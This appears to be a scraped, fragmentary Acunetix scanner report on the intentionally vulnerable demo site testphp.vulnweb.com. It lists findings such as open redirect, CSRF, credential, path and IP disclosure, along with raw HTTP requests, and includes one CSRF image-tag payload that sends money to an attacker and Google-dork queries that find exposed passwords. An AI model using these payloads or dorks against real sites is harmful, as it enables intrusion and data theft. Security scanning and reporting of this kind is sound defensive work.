









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


URL redirection

MediumSeverity

ValidationType

Scripting (XFS_and_Redir.script)Reported by module

Description

This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they arevisiting.

Impact

A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker toconduct phishing attacks, trojan distribution, spammers.

Recommendation

Your script should properly sanitize user input.

References

Unvalidated Redirects and Forwards Cheat Sheet

HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics

Affected items

/redir.php

Details

URL encoded GET input r was set to http://www.vulnweb.com.

GET /redir.php?r=http://www.vulnweb.com HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

User credentials are sent in clear text

MediumSeverity

ConfigurationType


Description

User credentials are transmitted over an unencrypted channel. This information should always be transferred via anencrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Recommendation

Because user credentials are considered sensitive information, should always be transferred to the server over anencrypted connection (HTTPS).

Affected items

/signup.php

Details

Form name: form1Form action: http://testphp.vulnweb.com/secured/newuser.phpForm method: POST Form inputs: - uuname [Text]- upass [Password]- upass2 [Password]- urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- signup [Submit]

GET /signup.php HTTP/1.1

Pragma: no-cache











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


WS_FTP log file found

MediumSeverity

ValidationType

Scripting (WS_FTP_log_file.script)Reported by module

Description

WS_FTP is a popular FTP client. This application creates a log file named WS_FTP.LOG. This file contains sensitivedata such as file source/destination and file name, date/time of upload etc.

Impact


Recommendation


References

ws_ftp.log

Affected items

/pictures//WS_FTP.LOG

Details

Pattern found: 103.05.06 13:17

GET /pictures//WS_FTP.LOG HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0663.html

Clickjacking: X-Frame-Options header missing

LowSeverity

ConfigurationType

Scripting (Clickjacking_X_Frame_Options.script)Reported by module

Description

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Webuser into clicking on something different from what the user perceives they are clicking on, thus potentially revealingconfidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjackingattack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should beallowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that theircontent is not embedded into other sites.

Impact

The impact depends on the affected web application.

Recommendation

Configure your web server to include an X-Frame-Options header. Consult Web references for more information aboutthe possible values for this header.

References

Clickjacking

OWASP Clickjacking

Defending with Content Security Policy frame-ancestors directive

Frame Buster Buster

The X-Frame-Options response header

Affected items

Web Server

Details


GET / HTTP/1.1






Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://en.wikipedia.org/wiki/Clickjacking

https://www.owasp.org/index.php/Clickjacking

https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet#Defending_with_Content_Security_Policy_frame-ancestors_directive

http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed

https://developer.mozilla.org/en-US/docs/HTTP/X-Frame-Options

Cookie(s) without HttpOnly flag set

LowSeverity

InformationalType


Description

This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.

Impact

None

Recommendation

If possible, you should set the HTTPOnly flag for this cookie.

Affected items

/

Details

Cookies found: - Name: login, Domain: testphp.vulnweb.com

GET / HTTP/1.1






Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Hidden form input named price was found

LowSeverity

InformationalType


Description

A hidden form input named price was found. It's not recommended to hide sensitive information in hidden form fields.

Impact

User may change price information before submitting the form.

Recommendation

Check if the script inputs are properly validated.

Affected items

/product.php (68db51598a6b1e726aa518e093bbd4ff)

Details

Form name: f_addcartForm action: http://testphp.vulnweb.com/cart.phpForm method: POST Form inputs: - price [Hidden]- addcart [Hidden]

GET /product.php?pic=2 HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/search.php









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


MySQL username disclosure

LowSeverity

ConfigurationType


Description

For a client program to be able to connect to the MySQL server, it must use the proper connection parameters, such asthe name of the host where the server is running and the user name and password of your MySQL account. When the connection to the database cannot be established, the server returns an error message including the MySQLusername and host that were used. This information should not be present on a production system.

Impact

This file may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Make sure the MySQL connection can be established and configure PHP not to display error messages.

Affected items


Details

Pattern found: Access denied for user 'root'@'localhost' (using password: NO)


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Details

Pattern found: Access denied for user 'wauser'@'localhost' (using password: NO)


Pragma: no-cache













Request headers



Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Possible sensitive directories

LowSeverity

ValidationType

Scripting (Possible_Sensitive_Directories.script)Reported by module

Description

A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks forcommon sensitive resources like backup directories, database dumps, administration pages, temporary directories. Eachone of these directories could help an attacker to learn more about his target.

Impact

This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.

Recommendation

Restrict access to this directory or remove it from the website.

References

Web Server Security and Database Server Security

Affected items

/admin

Details


GET /admin HTTP/1.1

Accept: acunetix/wvs










Chrome/41.0.2228.0 Safari/537.21

Request headers

/CVS

Details


GET /CVS HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Request headers

/secured

Details


GET /secured HTTP/1.1

Request headers


http://www.acunetix.com/websitesecurity/webserver-security/











Chrome/41.0.2228.0 Safari/537.21


Broken links

InformationalSeverity

InformationalType


Description

A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.This page was linked from the website but it is inaccessible.

Impact

Problems navigating the site.

Recommendation

Remove the links to this file or make it accessible.

Affected items

/medias/css/main.css

Details

For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.

GET /medias/css/main.css HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/medias/js/common_functions.js

Details


GET /medias/js/common_functions.js HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html












Request headers


Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/Mod_Rewrite_Shop/Details/color-printer/3

Details


GET /Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1

Details


GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1

Pragma: no-cache


Referer:

http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/Details/web-camera-a4tech/2

Details


GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


/privacy.php

Details


GET /privacy.php HTTP/1.1

Pragma: no-cache











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/secured/office_files/filelist.xml

Details


GET /secured/office_files/filelist.xml HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/secured/office.htm












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Templates/logout.php

Details


GET /Templates/logout.php HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Email address found


InformationalType

ScannerReported by module

Description

One or more email addresses have been found on this page. The majority of spam comes from email addressesharvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scourthe internet looking for email addresses on any website they come across. Spambot programs look for strings [email protected] and then record any addresses found.

Impact

Email addresses posted on Web sites may attract spam.

Recommendation

Check references for details on how to solve this problem.

References

Anti-spam techniques

Affected items

/

Details

List of all email addresses found on this host. - [email protected]/- [email protected]/secured/- [email protected]/secured/- [email protected]/secured/- [email protected]/- [email protected]/, /Templates/


https://en.wikipedia.org/wiki/Anti-spam_techniques

GHDB: Default phpinfo page


InformationalType

GHDBReported by module

Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Files containing passwords This will look throught default phpinfo pages for ones that have a default mysql password. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.

Impact

Not available. Check description.

Recommendation


References

Acunetix Google hacking

Affected items


Details

We found intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.acunetix.com/websitesecurity/google-hacking/

GHDB: phpinfo()


InformationalType


Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Files containing juicy info this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! Imean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apacheenv vars, *sigh* the list goes on and on! Thanks "joe!" =) The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.

Impact


Recommendation


References


Affected items


Details

We found intitle:phpinfo "PHP Version"


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers



GHDB: Sablotron error message


InformationalType


Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Error Messages Sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These errormessages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.

Impact


Recommendation


References


Affected items


Details

We found warning "error on line" php sablotron


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers



GHDB: SQL error message


InformationalType


Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Error Messages Another SQL error message, this message can display the username, database, path names and partial SQL code, all ofwhich are very helpful for hackers... The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.

Impact


Recommendation


References


Affected items


Details

We found "access denied for user" "using password" -documentation


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Details

We found "access denied for user" "using password" -documentation


Pragma: no-cache









Request headers








Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Microsoft Office possible sensitive information


InformationalType


Description

This document has been converted to HTML using Microsoft Office. It seems that Office has included sensitiveinformation during the conversion.

Impact

Possible sensitive information disclosure that may help an attacker to conduct social engineering attacks.

Recommendation

Inspect the source code of this document and remove the sensitive information.

References

iMPERVA Source Code Disclosure

Affected items

/secured/office.htm

Details

Pattern found: <o:DocumentProperties> <o:Author>Acunetix</o:Author> <o:LastAuthor>Acunetix</o:LastAuthor> <o:Revision>1</o:Revision> <o:TotalTime>0</o:TotalTime> <o:Created>2005-04-05T11:44:00Z</o:Created> <o:LastSaved>2005-04-05T11:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>5</o:Words> <o:Characters>30</o:Characters> <o:Company>Acunetix</o:Company> <o:Lines>1</o:Lines> <o:Paragraphs>1</o:Paragraphs> <o:CharactersWithSpaces>34</o:CharactersWithSpaces> <o:Version>11.6360</o:Version> </o:DocumentProperties>

GET /secured/office.htm HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers



Password type input with auto-complete enabled


InformationalType


Description

When a new name and password is entered in a form and the form is submitted, the browser asks if the passwordshould be saved.Thereafter when the form is displayed, the name and password are filled in automatically or arecompleted as the name is entered. An attacker with local access could obtain the cleartext password from the browsercache.

Impact


Recommendation

The password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to: <INPUT TYPE="password" AUTOCOMPLETE="off">

Affected items

/login.php

Details

Password type input(s): pass from form named loginform with action userinfo.php have autocomplete enabled.

GET /login.php HTTP/1.1




Chrome/41.0.2228.0 Safari/537.21





Request headers

/login.php

Details

Password type input(s): pass from unnamed form with action search.php?test=query have autocomplete enabled.

GET /login.php HTTP/1.1




Chrome/41.0.2228.0 Safari/537.21





Request headers


Possible CSRF (Cross-site request forgery)


ValidationType

CSRFReported by module

Description

Manual confirmation is required for this alert.This script is possibly vulnerable to cross-site request forgery. Cross Site Reference Forgery (CSRF/XSRF) is a class ofattack that affects web based applications with a predictable structure for invocation. An attacker tricks the user intoperforming an action of the attackers choosing by directing the victim's actions on the target application with a link orother content.The attack works by including a link or script in a page that accesses a site to which the user is known (or is supposed)to have authenticated. Here is an example: <img src="http://bank.example/withdraw?from=victim&amount=1000000&to=attacker">If the bank keeps authentication information in a cookie, and if the cookie hasn't expired, then victim's browser's attemptto load the image will submit the withdrawal form with his cookie. This vulnerability is also known by several other names including Session Riding and One-Click Attack.

Impact

Depends on implementation.

Recommendation

Insert custom random tokens into every form and URL that will not be automatically submitted by the browser. CheckReferences for detailed information on protecting against this vulnerability.

References

Cross Site Reference Forgery

Cross-Site Request Forgeries

The Cross-Site Request Forgery (CSRF/XSRF) FAQ

Cross-site request forgery

Top 10 2007-Cross Site Request Forgery

Affected items

/AJAX/infotitle.php

Details




Origin: http://testphp.vulnweb.com


Chrome/41.0.2228.0 Safari/537.21

content-type: application/x-www-form-urlencoded

Accept: */*

Content-Length: 4

Cookie: mycookie=3; login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;



08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk





Pragma: no-cache


id=1

Request headers


https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/csrf_paper.pdf

http://shiflett.org/articles/cross-site-request-forgeries

http://www.cgisecurity.com/articles/csrf-faq.shtml

http://en.wikipedia.org/wiki/Cross-site_request_forgery

http://www.owasp.org/index.php/Top_10_2007-A5

Possible internal IP address disclosure


InformationalType


Description

A string matching an internal IPv4 address was found on this page. This may disclose information about the IPaddressing scheme of the internal network. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required.

Impact


Recommendation

Prevent this information from being displayed to the user.

Affected items

/404.php

Details

Pattern found: 192.168.0.28

GET /404.php HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/pictures/ipaddresses.txt

Details


GET /pictures/ipaddresses.txt HTTP/1.1

Pragma: no-cache














Request headers


Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Details



Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Possible server path disclosure (Unix)


InformationalType


Description

One or more fully qualified path names were found on this page. From this information the attacker may learn the filesystem structure from the web server. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required.

Impact


Recommendation

Prevent this information from being displayed to the user.

References

Full Path Disclosure

Affected items


Details

Pattern found: /usr/local/etc/httpd/htdocs2/destination


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Details

Pattern found: /usr/obj/usr/src/sys/GENERIC


Pragma: no-cache












Request headers


https://www.owasp.org/index.php/Full_Path_Disclosure



Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Possible username or password disclosure


InformationalType


Description

A username and/or password was found in this file. This information could be sensitive. This alert may be a false positive, manual confirmation is required.

Impact


Recommendation


Affected items


Details

Pattern found: password: NO


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/pictures/credentials.txt

Details

Pattern found: password=something

GET /pictures/credentials.txt HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Request headers


Accept: */*


Details

Pattern found: password: NO


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Scanned items (coverage report)

Scanned 129 URLs. Found 60 vulnerable.

Vulnerabilities have been identified for this URL

URL: http://testphp.vulnweb.com/

1 input(s) found for this URL

Inputs

Input scheme 1

Input name Input type

Host HTTP Header

No vulnerabilities have been identified for this URL

URL: http://testphp.vulnweb.com/style.css

No input(s) found for this URL


URL: http://testphp.vulnweb.com/images/



URL: http://testphp.vulnweb.com/images/logo.gif



URL: http://testphp.vulnweb.com/login.php



URL: http://testphp.vulnweb.com/userinfo.php


Inputs

Input scheme 1


pass URL encoded POST

uname URL encoded POST

Input scheme 2


URL encoded POST

uaddress URL encoded POST

ucc URL encoded POST

uemail URL encoded POST

uphone URL encoded POST

urname URL encoded POST

Input scheme 3



update URL encoded POST

Input scheme 4






update URL encoded POST





URL: http://testphp.vulnweb.com/cart.php


Inputs

Input scheme 1


del URL encoded GET

Input scheme 2


del URL encoded GET

addcart URL encoded POST

Input scheme 3


addcart URL encoded POST

price URL encoded POST


URL: http://testphp.vulnweb.com/search.php


Inputs

Input scheme 1


test URL encoded GET

URL encoded POST

searchFor URL encoded POST

Input scheme 2


test URL encoded GET

searchFor URL encoded POST


URL: http://testphp.vulnweb.com/hpp/


Inputs

Input scheme 1


pp URL encoded GET


URL: http://testphp.vulnweb.com/hpp/params.php


Inputs

Input scheme 1


URL encoded GET

Input scheme 2


p URL encoded GET

pp URL encoded GET

Input scheme 3



aaaa URL encoded GET

p URL encoded GET

pp URL encoded GET


URL: http://testphp.vulnweb.com/hpp/index.php


Inputs

Input scheme 1


pp URL encoded GET


URL: http://testphp.vulnweb.com/hpp/test.php



URL: http://testphp.vulnweb.com/index.php



URL: http://testphp.vulnweb.com/artists.php


Inputs

Input scheme 1


artist URL encoded GET


URL: http://testphp.vulnweb.com/privacy.php



URL: http://testphp.vulnweb.com/guestbook.php


Inputs

Input scheme 1


name URL encoded POST

text URL encoded POST

Input scheme 2


URL encoded POST


text URL encoded POST


URL: http://testphp.vulnweb.com/categories.php



URL: http://testphp.vulnweb.com/Flash/



URL: http://testphp.vulnweb.com/Flash/add.swf




URL: http://testphp.vulnweb.com/Flash/add.fla



URL: http://testphp.vulnweb.com/AJAX/



URL: http://testphp.vulnweb.com/AJAX/index.php



URL: http://testphp.vulnweb.com/AJAX/styles.css



URL: http://testphp.vulnweb.com/AJAX/titles.php



URL: http://testphp.vulnweb.com/AJAX/artists.php



URL: http://testphp.vulnweb.com/AJAX/categories.php



URL: http://testphp.vulnweb.com/AJAX/showxml.php


Inputs

Input scheme 1


text/xml Custom POST

xml.node#text XML

xml.node#text XML

xml.node:name XML

xml.node:name XML


URL: http://testphp.vulnweb.com/AJAX/infoartist.php


Inputs

Input scheme 1


id URL encoded GET


URL: http://testphp.vulnweb.com/AJAX/infocateg.php


Inputs

Input scheme 1


id URL encoded GET



URL: http://testphp.vulnweb.com/AJAX/infotitle.php


Inputs

Input scheme 1


id URL encoded POST


URL: http://testphp.vulnweb.com/AJAX/htaccess.conf



URL: http://testphp.vulnweb.com/disclaimer.php



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php


Inputs


Input scheme 1


id URL encoded GET


URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php


Inputs

Input scheme 1


id URL encoded GET


URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php



URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php


Inputs

Input scheme 1


id URL encoded GET


URL: http://testphp.vulnweb.com/signup.php



URL: http://testphp.vulnweb.com/sendcommand.php


Inputs

Input scheme 1


URL encoded POST

cart_id URL encoded POST

Input scheme 2


cart_id URL encoded POST


URL: http://testphp.vulnweb.com/listproducts.php


Inputs

Input scheme 1


cat URL encoded GET

Input scheme 2



Input scheme 3



cat URL encoded GET



URL: http://testphp.vulnweb.com/product.php


Inputs

Input scheme 1


pic URL encoded GET


URL: http://testphp.vulnweb.com/showimage.php


Inputs

Input scheme 1


file URL encoded GET

size URL encoded GET

Input scheme 2


file URL encoded GET


URL: http://testphp.vulnweb.com/redir.php


Inputs

Input scheme 1


r URL encoded GET


URL: http://testphp.vulnweb.com/Templates/



URL: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php



URL: http://testphp.vulnweb.com/Templates/logout.php



URL: http://testphp.vulnweb.com:80/crossdomain.xml



URL: http://testphp.vulnweb.com/secured/



URL: http://testphp.vulnweb.com/secured/newuser.php


Inputs

Input scheme 1


URL encoded POST





upass URL encoded POST

upass2 URL encoded POST



uuname URL encoded POST

Input scheme 2


signup URL encoded POST


URL: http://testphp.vulnweb.com/secured/style.css



URL: http://testphp.vulnweb.com/secured/database_connect.php



URL: http://testphp.vulnweb.com/secured/index.php



URL: http://testphp.vulnweb.com/secured/office.htm



URL: http://testphp.vulnweb.com/secured/phpinfo.php


Inputs

Input scheme 1


URL encoded GET


URL: http://testphp.vulnweb.com/secured/office_files



URL: http://testphp.vulnweb.com/secured/office_files/filelist.xml



URL: http://testphp.vulnweb.com/comment.php


Inputs

Input scheme 1


aid URL encoded GET

Input scheme 2


URL encoded POST

comment URL encoded POST


phpaction URL encoded POST


Input scheme 3


pid URL encoded GET

Input scheme 4


aid URL encoded GET

pid URL encoded GET

Input scheme 5


aid URL encoded GET

pid URL encoded GET


Input scheme 6


aid URL encoded GET

pid URL encoded GET

comment URL encoded POST


phpaction URL encoded POST

Submit URL encoded POST


URL: http://testphp.vulnweb.com/.idea/



URL: http://testphp.vulnweb.com/.idea/.name



URL: http://testphp.vulnweb.com/.idea/acuart.iml



URL: http://testphp.vulnweb.com/.idea/encodings.xml



URL: http://testphp.vulnweb.com/.idea/misc.xml



URL: http://testphp.vulnweb.com/.idea/modules.xml



URL: http://testphp.vulnweb.com/.idea/scopes/



URL: http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml



URL: http://testphp.vulnweb.com/.idea/vcs.xml




URL: http://testphp.vulnweb.com/.idea/workspace.xml



URL: http://testphp.vulnweb.com/_mmServerScripts/



URL: http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php


Inputs

Input scheme 1


Type URL encoded POST


URL: http://testphp.vulnweb.com/_mmServerScripts/mysql.php



URL: http://testphp.vulnweb.com/404.php



URL: http://testphp.vulnweb.com/adm1nPan3l/



URL: http://testphp.vulnweb.com/adm1nPan3l/index.php



URL: http://testphp.vulnweb.com/admin/



URL: http://testphp.vulnweb.com/admin/create.sql



URL: http://testphp.vulnweb.com/bxss/



URL: http://testphp.vulnweb.com/bxss/adminPan3l/



URL: http://testphp.vulnweb.com/bxss/adminPan3l/index.php



URL: http://testphp.vulnweb.com/bxss/adminPan3l/style.css



URL: http://testphp.vulnweb.com/bxss/cleanDatabase.php




URL: http://testphp.vulnweb.com/bxss/database_connect.php



URL: http://testphp.vulnweb.com/bxss/index.php



URL: http://testphp.vulnweb.com/bxss/test.js



URL: http://testphp.vulnweb.com/bxss/vuln.php


Inputs

Input scheme 1


id URL encoded GET


URL: http://testphp.vulnweb.com/clearguestbook.php



URL: http://testphp.vulnweb.com/clientaccesspolicy.xml



URL: http://testphp.vulnweb.com/Connections/



URL: http://testphp.vulnweb.com/Connections/DB_Connection.php



URL: http://testphp.vulnweb.com/CVS/



URL: http://testphp.vulnweb.com/CVS/Entries



URL: http://testphp.vulnweb.com/CVS/Entries.Log



URL: http://testphp.vulnweb.com/CVS/Repository



URL: http://testphp.vulnweb.com/CVS/Root



URL: http://testphp.vulnweb.com/database_connect.php




URL: http://testphp.vulnweb.com/index.bak



URL: http://testphp.vulnweb.com/pictures/



URL: http://testphp.vulnweb.com/pictures/1.jpg.tn
























URL: http://testphp.vulnweb.com/pictures/credentials.txt



URL: http://testphp.vulnweb.com/pictures/ipaddresses.txt



URL: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html



URL: http://testphp.vulnweb.com/pictures/path-disclosure-win.html



URL: http://testphp.vulnweb.com/pictures/wp-config.bak




URL: http://testphp.vulnweb.com/pictures/WS_FTP.LOG



URL: http://testphp.vulnweb.com/wvstests/



URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/



URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/



URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/version.php



URL: http://testphp.vulnweb.com/medias



URL: http://testphp.vulnweb.com/medias/img



URL: http://testphp.vulnweb.com/medias/css



URL: http://testphp.vulnweb.com/medias/css/main.css



URL: http://testphp.vulnweb.com/medias/js



URL: http://testphp.vulnweb.com/medias/js/common_functions.js



Developer Report - E-SPIN Group · and/or deface your website. Alerts distribution ... -...

Documents

Transcript of Developer Report - E-SPIN Group · and/or deface your website. Alerts distribution ... -...